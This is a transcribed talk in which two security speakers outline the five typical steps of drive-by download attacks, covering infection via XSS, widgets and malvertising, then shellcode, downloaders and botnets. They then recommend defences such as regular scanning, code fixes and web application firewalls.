Drive-by downloads 2: malware code implementation and preventive measures

Read previous: Drive-by downloads: exploiting cross-site scripting vulnerabilities

As Neil Daswani and Lars Ewe are moving on with their discussion, they outline the five main steps that cyber criminals tend to take for conducting drive-by downloads. Additionally, some helpful recommendations are provided as to the preventive methods to avoid the consequences of third party web applications being exploited by fraudsters out there.

Neil Daswani: As Lars mentioned, software vulnerabilities, web application vulnerabilities are a key root cause of malware getting planted on websites in terms of drive-by downloads. There are several other root causes as well. So for instance, over the past four to five years, what happened as the Web 2.01 transition has occurred is that if you go to a given website, the content on that website is coming from a lot of places, not just the website itself.

Ways to infect a site

Ways to infect a site

And there are a lot of widgets that are used on the websites. Some widgets are used to render advertising on a website, other widgets are used to provide audience measurement functionality, other widgets provide video playing functionality. In any case, there are tons of these different widgets, and when you visit a website there is content coming from all kinds of places. Now, of course anytime that you have a widget on a website that is rendered by a piece of JavaScript or an iFrame, the content provider or the enterprise business is pretty much giving up part of the control of the website to a third party. If that third party gets compromised, well, so can your website, and your website can be turned into a distribution vehicle for malware.

In fact, there have been specific names that have been attributed to such kinds of cases. For instance, in the case that you have a website and you have an ad widget on your website, which, you know, you may be relying on for revenue and monetizing your website; in the case that your website gets infected via malicious advertisements that come through that ad network, that’s often referred to as malvertising, and malvertising is also being increasingly used to spread malware on websites.

So in any case, attackers can use these techniques to infect a site, or two sites, or three sites, or thousands of sites because of the fact that a particular web application vulnerability might exist, say, in some third party package that is used by lots of websites. Similarly, a particular widget or an ad network might be used by many, many websites, and so when an attacker exploits any of these types of issues it typically allows them to distribute their malware through a network of websites that take advantage of this functionality.

In any case, that’s a little bit about the different vectors. So we will go through the anatomy of the steps that attackers conduct and the steps that take place when a drive-by download occurs.

There are typically 5 steps cyber criminals execute to effectively conduct drive-by downloads.

So, step one in using websites to distribute malware is you have to infect a website. In the demo that we showed earlier, it was a stored cross-site scripting vulnerability that was used to plant some drive-by download code onto a site and infect users. But there are many other ways to do it as well, as I just reviewed with regards to taking advantage of different widgets and whatnot.

The second step is, once the site has been infected, there’s a number of activities that take place online. So when a user loads a webpage that is infected, there is a whole bunch of resources on that web page. The legitimate resources on the web page get rendered, but so do the malicious JavaScripts and iFrames and whatnot that were injected.

Once those JavaScripts start running, one of the first things that the attackers’ code does is it basically fingerprints the user’s browser, figures out what version of the browser they are using, whether it’s IE or Firefox, or Chrome, or Safari. It figures out what all the different third party plug-ins are being used, whether they have Acrobat Reader, Flash, ActiveX installed, etc.

And depending upon that, the attackers have an online exploit database which gets consulted. And what happens is that the client-side vulnerability that is most likely to result in a successful infection is chosen, and the corresponding shellcode2 to, say, take advantage of a buffer overflow or other type of vulnerability on the client is selected and the shellcode is delivered.

Once the shellcode is delivered, the attacker basically has control of the stack on the user’s machine and they take advantage of that capability to download a downloader – a piece of malware whose sole purpose in life is to download more malware. It basically also provides a level of interaction, so that once the attackers compromise a machine they can then decide to download different malware every single day if they like. They could one day download something that conducts fraud; another thing that it can do – and that’s the way it usually happens – is add that machine to a botnet of some sort so that they have further control over it.

Drive-by download steps:

1 – Infecting a site

2 – Invoking a client-side vulnerability

3 – Delivering a shellcode

4 – Sending a downloader

5 – Taking advantage of the infected PC

So once the downloader gets sent, once another piece of malware gets sent, it’s kind of ‘game over’ – the attacker has control over the machine. There have been many types of applications, so the cyber criminals that do this are interested in taking control of users’ machines. But they are also interested in doing things like planting malware on a corporate website because they know employees access that corporate website very often, and it provides them with a great mechanism to take advantage of compromising machines within the enterprise as well.

So there is a whole bunch of different mechanisms but these five steps: infecting the site, invoking the client-side vulnerability, sending the shellcode, sending the downloader and then doing whatever they would like with the machine – are typically the five steps that cyber criminals execute when they want to effectively conduct drive-by downloads.

So that’s a little bit about that process. What I’ll do is I’ll turn it back over to Lars to just start talking about what are some of the things that organizations can do to help protect themselves using a defense-in-depth3 approach.

Lars Ewe: Now that we have talked about what can happen and hopefully convincingly enough proven the point that bad things can happen, very bad things indeed can happen, you wanna ask yourself – what do you do, how do you defend yourself? You know, it’s no fun just to learn how bad the state of defense is, it’s important to learn what your options are.

So the first thing is that you wanna assess your sites. You need to understand that if you are running a website, not only are you responsible for the data within your site – let’s say, you store credit card information or personal information, anything like that, obviously you carry responsibility, and many different complaints and issues will occur if you do not make sure you secure that data correctly, depending on the vector or vertical that you are in.

Lifecycle of malware protection

Lifecycle of malware protection

But just as important as that is the fact that you have responsibility to your user base. You do not want to actually be the one who distributes malware to all your users, and yet no data might get compromised potentially on your site but data on the clients’, on the users’ machines might still be wiped out or it might join the botnet or something like that.

All that being said, that responsibility is yours as the website owner, so do assessments regularly. You have options there as to whose services you want to use, I will encourage you to do some regular antimalware, antivirus scanning – we refer to that often as persistent security.

Every time you do a patch to your site, you might potentially recreate a new security hole. Often the smallest little change in code can result in such thing. New attack vectors come out all the time. Companies like Cenzic update their attack libraries on a very regular basis, in our case on a weekly basis.

So scanning very regularly is one thing. Then, try to prevent once you have findings. Once you know that there are vulnerabilities, try to address them – ideally in code, you have various means there, once the vulnerability is found you then know what specifically you have to do. Either way, at the code level you can also do code reviews, there are best practices you can follow at the code level. You will find that in many cases fixing the code is not an immediate option. If you want to take (and you ought to take) quick preventive steps, then web application Firewalls or any other containment technologies are the next step to look at.

As a matter of fact, you usually wanna do a two-phase approach. First, you immediately wanna put in place a Firewall, you wanna filter the content, and then you wanna also in parallel start looking at the root cause at the code level and fix at the code level, roll out a fix at the code level as well.

So there are many means at that level. After that I’ll hand it over to Neil to talk more about malware aspect of it once you’ve taken care of the web application vulnerability aspect upfront.

Read next: Drive-by downloads 3: web anti-malware services

1Web 2.0 is a loosely defined intersection of web application features that facilitate participatory information sharing, interoperability, user-centered design and collaboration on the World Wide Web.

2Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called ‘shellcode’ because it typically starts a command shell from which the attacker can control the compromised machine.

3Defense-in-depth is an information assurance (IA) concept in which multiple layers of security controls (defense) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in case a security control fails or a vulnerability is exploited.

Like This Article? Let Others Know!
Related Articles:

Comments are closed.

Comment via Facebook: